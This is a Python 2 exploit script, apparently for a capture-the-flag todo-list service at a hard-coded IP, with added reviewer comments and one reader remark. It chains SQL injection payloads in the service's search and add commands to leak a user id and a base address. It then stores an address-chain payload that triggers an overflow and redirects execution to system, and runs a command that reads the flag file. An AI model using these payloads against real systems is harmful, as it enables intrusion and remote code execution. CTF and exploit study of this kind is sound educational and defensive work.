import random
import socket
import string
import sys
import time
from binascii import hexlify
from binascii import unhexlify
def make_address(offset, address):
    """Return ``offset + address`` as an 8-byte little-endian string.

    The sum is rendered as 16 hex digits, decoded to 8 raw bytes and then
    reversed, which yields the little-endian byte order the rest of the
    script embeds into its payload.  Values that need more than 16 hex
    digits produce a longer result; negative sums are not supported
    (the leading '-' is not a hex digit).
    """
    big_endian = unhexlify(format(offset + address, "016x"))
    return big_endian[::-1]
# NOTE(review): CTF exploit script as posted, kept byte-identical; only
# comments were added. The code is Python 2 (plain str is sent over the
# socket, and the final `print` is a statement). Every recv() below can raise
# socket.timeout after the 2s timeout set on the socket; nothing catches it.
HOST = '88.198.89.199'
PORT = 1234
# Module-relative offset added to the leaked base in make_address(); it is
# negative, so the leaked base must be large enough for the sum to be a
# valid non-negative address — presumably the case for the target.
system_address = -0xebace0
# Connect
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.settimeout(2)
s.recv(1024)
# Generate user
# Random 16-char alphanumeric name; the same string doubles as the password.
username = ''.join([random.choice(string.ascii_letters + string.digits) for i in range(16)])
# Register
s.sendall("register %s %s\n" % (username, username))
s.recv(1024)
# Login
s.sendall("login %s %s\n" % (username, username))
s.recv(1024)
# Leak userid
# Defender note: the service's `search` command evidently concatenates the
# user-supplied term into its SQL text — the quote closes the string, UNION
# appends an attacker-chosen SELECT and '#' comments out the remainder.
# Parameterized queries (or at minimum proper escaping) would close this.
s.sendall("search x' union select id from users where name='%s'#\n" % (username))
s.recv(1024)
s.sendall("show 0\n")
# The reply is assumed to carry the id after a 3-character prefix — TODO confirm.
userid = int(s.recv(1024)[3:])
# print "Userid: %d" % userid
# Leak base address
# Same injection; the extra UNION row is used so that "show 11" returns a
# value from which 6 bytes of an address are read back, little-endian.
s.sendall("search x' union select table_name from information_schema.tables limit 10 union select char(14)#\n")
s.recv(1024)
s.sendall("show 11\n")
s.recv(4)
# 0x19d0 is the distance from the leaked pointer to the module base; its
# origin is not recoverable from this script.
offset = int(hexlify(s.recv(6)[::-1]), 16) - 0x19d0
# print "Base address: 0x%x" % offset
s.recv(1024)
# Add dummy value and payload
# 64 bytes of filler (with a 0x02 at index 56) followed by four 8-byte
# addresses computed from the leaked base. What each offset points at
# depends on the target binary and is not stated on this page.
payload = '\x00' * 56 + '\x02' + '\x00' * 7
payload += make_address(offset, 0x223d)
payload += make_address(offset, 0x2238)
payload += make_address(offset, system_address)
payload += make_address(offset, 0x223d)
payload = hexlify(payload)
# Defender note: the `add` command is injectable the same way; the payload
# is stored as a second todo row for this user via unhex().
s.sendall("add dummy'), (%s, unhex('%s'))##" % (userid, payload))
s.recv(1024)
# Overflow payload to 0x203d68
# Reading the stored todo content back through the injected search is what
# triggers the overflow; the target address above is the author's annotation.
s.sendall("search x' union select table_name from information_schema.tables limit 10 union select char(10) union select content from todos where user=%s#\n" % userid)
s.recv(1024)
# Test
# If control flow was redirected as intended, the `add` argument is executed
# as a command and its output is echoed back.
s.sendall("add cat /home/user/flag\n")
print s.recv(1024)

hellman commented Jan 1, 2014

nice exploit!
